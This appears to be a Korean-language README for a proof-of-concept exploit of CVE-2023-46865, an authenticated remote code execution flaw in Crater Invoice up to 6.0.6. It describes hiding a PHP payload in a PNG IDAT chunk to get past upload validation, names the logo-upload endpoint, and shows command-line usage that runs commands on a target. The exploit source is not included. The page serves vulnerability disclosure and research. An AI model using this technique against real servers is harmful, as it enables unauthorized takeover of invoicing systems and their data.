
Crater <=6.0.6, CVE-2023-46865 인증 후 RCE (Superadmin)
Crater <=6.0.6, CVE-2023-46865 인증 후 RCE (슈퍼관리자)
Crater Invoice는 적절한 입력 검증이 없어 위험한 유형의 무제한 파일 업로드에 취약합니다. Base64Mime 검사 클래스는 IDAT 이미지 청크에 유효한 PHP 페이로드를 내장하여 우회할 수 있습니다. 슈퍼관리자 권한이 있는 사용자는 /api/v1/company/upload-logo에서 회사 로고를 통해 조작된 페이로드를 업로드할 수 있습니다.
$~ usage: python3 crater-rce.py --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
$~ python3 crater-rce.py --target http://192.168.1.1 --email [email protected] --password test1234 --cmd 'whoami'
$~ python3 crater-rce.py -h
usage: crater-rce.py [-h] --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
Crater Invoice RCE - CVE-2023-46865
options:
-h, --help show this help message and exit
--target TARGET Target URL
--email EMAIL Email
--password PASSWORD Password
--cmd CMD Command to execute
- Crater 6.0.6
- Kali 6.1.0
faisalfs10x - 개념 증명(PoC) 개발을 도와주셨습니다.
이 스크립트는 보안 분석 및 연구 목적으로만 제공되므로, 불법적인 활동에 사용될 경우 책임을 지지 않습니다.